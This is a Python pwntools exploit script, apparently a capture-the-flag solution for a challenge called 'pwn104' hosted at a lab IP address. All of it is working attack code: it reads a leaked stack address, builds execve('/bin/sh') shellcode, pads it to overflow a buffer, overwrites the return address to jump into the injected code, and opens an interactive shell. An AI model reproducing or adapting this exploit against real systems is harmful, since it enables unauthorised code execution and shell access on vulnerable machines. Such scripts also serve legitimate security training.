#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./pwn104", checksec=False)
# r = process()
r = remote("10.10.167.194", 9004)

# funcs
s = lambda a: r.sendline(a)

# leak
r.recvuntil(b"at ")
stack = int(r.recvline().strip(), 16)
log.info("stack: %#x", stack)

# shellcode
sc = """
lea rdi, [rsi+13]
mov al, 59
cqo
xor rsi, rsi
syscall
"""
sc = asm(sc)
sc += b"/bin/sh\0"
sc += b"A"*(88-len(sc))
sc += p64(stack)
s(sc)

r.interactive()